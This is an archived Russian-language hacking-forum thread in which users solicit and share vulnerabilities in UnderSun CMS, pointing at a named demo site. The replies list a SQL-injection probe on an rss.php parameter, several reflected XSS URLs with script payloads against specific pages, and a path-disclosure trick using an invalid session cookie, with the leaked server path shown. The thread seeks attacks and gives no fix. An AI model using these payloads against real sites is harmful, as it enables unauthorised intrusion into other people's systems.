Просмотр полной версии : Кто что знает про эту CMS ?
Нужны любые баги, уязвимости..
demo.undersky.ru
demo.undersky.ru/admin/
http://demo.undersky.ru/rss.php?mode=1'&doc=5
Кто еще что подкинет?
Это просто пример, на этом движке
UnderSun CMS называется..
Нужны любые баги, уязвимости..
demo.undersky.ru
demo.undersky.ru/admin/
http://demo.undersky.ru/rss.php?mode=1'&doc=5
Кто еще что подкинет?
Это просто пример, на этом движке
UnderSun CMS называется..
И так в GET запросе Mode
Ты поставил ', SQL иньекция это не ошибка, это выполнение произвольных команд. Запомни.
http://demo.undersky.ru/sites.html?p=2%22%3E%3Cscript%3Ealert();%3C/script%3E
http://demo.undersky.ru/forget_passw.html?answ=14%22%3E%3Cscript%3Ealert() ;%3C/script%3E http://demo.undersky.ru/news.html?id=3%22%3E%3Cscript%3Ealert();%3C/script%3E
Кароч там всё с XSS
Раскрытие путей
В куках
PHPSESSID=@#$%^&*
Итог
Warning: session_start() [function.session-start]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /usr/home/undersun/domains/demo.undersky.ru/public_html/index.php on line 7
Кароч сайтег дырявенький
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot